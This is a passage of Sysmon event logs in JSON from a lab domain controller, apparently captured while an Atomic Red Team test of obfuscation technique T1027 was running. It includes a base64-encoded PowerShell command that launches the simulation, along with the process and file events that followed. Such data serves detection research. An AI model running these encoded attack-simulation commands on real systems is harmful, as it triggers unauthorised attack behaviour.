05:52:37.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4964,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.499\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010A2E20700}\r\nTargetProcessId: 2844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.499","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010A2E20700}","TargetProcessId":"2844","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4965,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:37.499\r\nProcessGuid: {A837DB8D-0325-5F25-0000-00101ADF0700}\r\nProcessId: 2708\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.dll\r\nCreationUtcTime: 2020-08-01 05:52:37.421","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:37.499","ProcessGuid":"{A837DB8D-0325-5F25-0000-00101ADF0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cgophmbu\\cgophmbu.dll","CreationUtcTime":"2020-08-01 05:52:37.421","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.012\r\nProcessGuid: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nProcessId: 4112\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {if (Test-Path %%temp%%\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.012","ProcessGuid":"{A837DB8D-0326-5F25-0000-0010EEE40700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {if (Test-Path %%temp%%\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977435cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977c5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.999\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.999","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\S